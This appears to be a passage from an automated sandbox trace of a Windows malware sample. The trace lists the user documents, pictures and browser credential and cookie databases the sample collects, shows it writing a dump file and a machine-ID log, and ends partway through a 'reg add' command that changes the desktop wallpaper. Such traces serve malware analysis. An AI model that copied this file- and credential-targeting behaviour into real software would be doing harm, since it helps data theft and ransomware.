Blocks.dotx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FiKLlYoo j5ePOAA.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\wqHfuxshMYQlz.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\54Z4PLTGEqndqiz3l.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\gzgG b o3c.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sQcpe7y_e37kKQ 1S.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\B2HRjnj Cy6A-H dgdys.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\QiIJIhuAAuEZBbLqKHJ6.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\4ueyApzjR.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sZ-mvJRFLSQGLSr.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\_t6aWhRfJ2C7a_e5.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\0wJchQcNkFvmoOWLqz.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\FHEJii.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\WVY4HBl.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\n94BTv1wcjugrAM5GRY9.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\3PnXkAK4_WoRrsR.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\cDSWR2OIb8.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\ctKhzFxQrBX.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FkQKXs7m2F.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\95MYVGF5_rM.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\r4_0oc9EnjRh.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\sUjiIGFw8gHqMQ5uJmO.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\t2vg0Qz0z6T.jpg\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z\r\nC:\\Program Files\\desktop.ini\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe\r\nC:\\Program Files\\Java\\", cchWideChar=339053, lpMultiByteStr=0x7fd90018, cbMultiByte=339053, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\OfflineCache\\index.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Packages\\Microsoft.Windows.Photos_8wekyb3d8bbwe\\LocalState\\MediaDb.v1.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\content-prefs.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cookies.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\formhistory.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\kinto.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\permissions.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\places.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\chrome\\idb\\2918063365piupsah.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage\\permanent\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\storage.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\webappsstore.sqlite\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5A-3b.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\5UC29z.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FEPhIIgzp.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\j1_seNfY9YsSPrO.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\pA4DlvvotSqCLQb.xlsx\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\2M-Nd j92CbW7ShqCq.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\64ViLky MJ-FbLZtty.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\xg45.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\1otVYv2w1PnUvoA.xls\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\cXulwEpXFuX3h8kmE.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FAlPf1_iqLEidMEN4F.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\5QVKTwqSooul.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\kAZBkdhribwEPz- GM.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\L2 LL5CzSzHg0d.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\qeYwSL.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\DHBFRkC0Y1s_1InoiwZ.docx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\EM8H.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\vi3pXsOlMjGV.doc\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\16\\Built-In Building Blocks.dotx\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\FiKLlYoo j5ePOAA.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\wqHfuxshMYQlz.odt\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\IHepA6qmtTk6v8 rtu\\54Z4PLTGEqndqiz3l.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\gzgG b o3c.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sQcpe7y_e37kKQ 1S.ods\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\databases\\Databases.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\previews_opt_out.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\cert8.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\key3.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\secmod.db\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Microsoft\\Access\\AccessCache.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\Database1.accdb\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\B2HRjnj Cy6A-H dgdys.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\QiIJIhuAAuEZBbLqKHJ6.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\4ueyApzjR.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\uTLPAIPSplyVaoV88\\sZ-mvJRFLSQGLSr.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\Documents\\_t6aWhRfJ2C7a_e5.pdf\r\nC:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\0wJchQcNkFvmoOWLqz.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\FHEJii.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\cQep-2gcU8N-eLTI1k\\WVY4HBl.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\n94BTv1wcjugrAM5GRY9.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\3PnXkAK4_WoRrsR.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\cDSWR2OIb8.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\ctKhzFxQrBX.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FkQKXs7m2F.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\95MYVGF5_rM.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\-omfRXhku4HtqHef7\\k-jt3_fF8Y22f3ge\\FqTQKxshtz5\\r4_0oc9EnjRh.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\sUjiIGFw8gHqMQ5uJmO.jpg\r\nC:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_-s9qc7fmZDb\\zHUFhJqrOM5gMx575z_\\t2vg0Qz0z6T.jpg\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\ffjcext.zip\r\nC:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Installer\\chrome.7z\r\nC:\\Program Files\\desktop.ini\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jabswitch.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java-rmi.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\java.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.cpl\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javacpl.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javaw.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\javaws.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jjs.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\jp2launcher.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\keytool.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\kinit.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\klist.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\ktab.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\orbd.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\pack200.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\policytool.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\rmid.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\rmiregistry.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\classes.jsa\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\server\\Xusage.txt\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\servertool.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\ssvagent.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\tnameserv.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\bin\\unpack200.exe\r\nC:\\Program Files\\Java\\jre1.8.0_131\\COPYRIGHT\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\accessibility.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\amd64\\jvm.cfg\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\calendars.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\charsets.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\classlist\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\CIEXYZ.pf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\GRAY.pf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\LINEAR_RGB.pf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\PYCC.pf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\cmm\\sRGB.pf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\content-types.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\currency.data\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_de.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_es.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_fr.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_it.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ja.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_ko.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_pt_BR.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_sv.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_CN.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_HK.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\messages_zh_TW.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash@2x.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11-lic.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy\\splash_11@2x-lic.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\deploy.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\access-bridge-64.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\cldrdata.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\dnsns.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jaccess.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\jfxrt.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\localedata.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\meta-index\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\nashorn.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunec.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunjce_provider.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunmscapi.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\sunpkcs11.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\ext\\zipfs.jar\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\flavormap.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.bfc\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fontconfig.properties.src\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiBold.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightDemiItalic.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightItalic.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaBrightRegular.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansDemiBold.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaSansRegular.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterBold.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\fonts\\LucidaTypewriterRegular.ttf\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\hijrah-config-umalqura.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\cursors.properties\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\invalid32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_CopyNoDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_LinkNoDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\win32_MoveNoDrop32x32.gif\r\nC:\\Program Files\\Java\\jre1.8.0_131\\lib\\javafx.properties\r\nC:\\Program Files\\Java\\jre", lpUsedDefaultChar=0x0) returned 339053 [0195.353] VirtualAlloc (lpAddress=0x0, dwSize=0x60000, flAllocationType=0x101000, flProtect=0x4) returned 0x7fd30000 [0195.356] VirtualFree (lpAddress=0x7fdf0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.358] VirtualFree (lpAddress=0x7fd90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.361] VirtualAlloc (lpAddress=0x0, dwSize=0x13fff0, flAllocationType=0x1000, flProtect=0x4) returned 0x640000 [0195.365] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f994, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0195.365] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ALL_dmp.fldp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\all_dmp.fldp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0195.366] WriteFile (in: hFile=0x298, lpBuffer=0x71a890*, nNumberOfBytesToWrite=0x52c6d, lpNumberOfBytesWritten=0x19fb5c, lpOverlapped=0x0 | out: lpBuffer=0x71a890*, lpNumberOfBytesWritten=0x19fb5c*=0x52c6d, lpOverlapped=0x0) returned 1 [0195.370] CloseHandle (hObject=0x298) returned 1 [0195.892] VirtualFree (lpAddress=0x7fd30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.894] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\ALL_dmp.fldp" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\all_dmp.fldp")) returned 0x20 [0195.894] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0195.894] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0195.895] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9b4, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0195.895] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\log.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\log.txt")) returned 0xffffffff [0195.895] GetLastError () returned 0x2 [0195.895] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19f9b4, nSize=0x105 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\current_dirnwovkcyl.exe")) returned 0x35 [0195.895] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\log.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0195.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\\r\n[ALL_LOCAL_KID]: 460F9943EA70F103\r\n[LDRIVES]= 2891_1GB\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0195.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\\r\n[ALL_LOCAL_KID]: 460F9943EA70F103\r\n[LDRIVES]= 2891_1GB\r\n", cchWideChar=72, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 72 [0195.896] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="[LDRIVES]: C:\\\r\n[ALL_LOCAL_KID]: 460F9943EA70F103\r\n[LDRIVES]= 2891_1GB\r\n", cchWideChar=72, lpMultiByteStr=0x1fec4a0, cbMultiByte=72, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LDRIVES]: C:\\\r\n[ALL_LOCAL_KID]: 460F9943EA70F103\r\n[LDRIVES]= 2891_1GB\r\n", lpUsedDefaultChar=0x0) returned 72 [0195.896] WriteFile (in: hFile=0x298, lpBuffer=0x1fec4a0*, nNumberOfBytesToWrite=0x48, lpNumberOfBytesWritten=0x19fb2c, lpOverlapped=0x0 | out: lpBuffer=0x1fec4a0*, lpNumberOfBytesWritten=0x19fb2c*=0x48, lpOverlapped=0x0) returned 1 [0195.896] CloseHandle (hObject=0x298) returned 1 [0195.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LOGSAVED]", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0195.897] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="[LOGSAVED]", cchWideChar=10, lpMultiByteStr=0x1fb2f0c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[LOGSAVED]", lpUsedDefaultChar=0x0) returned 10 [0195.897] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\r") returned 1 [0195.898] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0195.898] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\r", cchWideChar=1, lpMultiByteStr=0x1fba5f4, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r", lpUsedDefaultChar=0x0) returned 1 [0195.898] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x4e8618, cbMultiByte=1, lpWideCharStr=0x19ebe0, cchWideChar=2047 | out: lpWideCharStr="\n") returned 1 [0195.898] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0195.898] WideCharToMultiByte (in: CodePage=0x1b5, dwFlags=0x0, lpWideCharStr="\n", cchWideChar=1, lpMultiByteStr=0x1fba5f4, cbMultiByte=1, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\n", lpUsedDefaultChar=0x0) returned 1 [0195.898] WriteFile (in: hFile=0x3c, lpBuffer=0x4e8594*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x19fc00, lpOverlapped=0x0 | out: lpBuffer=0x4e8594*, lpNumberOfBytesWritten=0x19fc00*=0xc, lpOverlapped=0x0) returned 1 [0195.898] GetCommandLineW () returned="\"C:\\Users\\CIiHmnxMn6Ps\\Desktop\\CURRENT_DIRnwovkcyl.exe\" " [0195.898] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1f9cf24, csidl=26, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming") returned 1 [0195.899] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x1f0f3bc, cbMultiByte=228, lpWideCharStr=0x19eb3c, cchWideChar=2047 | out: lpWideCharStr="/C reg add \"HKCU\\Control Panel\\Desktop\" /v Wallpaper /t REG_SZ /d \"[WP]\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v WallpaperStyle /t REG_SZ /d \"0\" /f & reg add \"HKCU\\Control Panel\\Desktop\" /v TileWallpaper /t 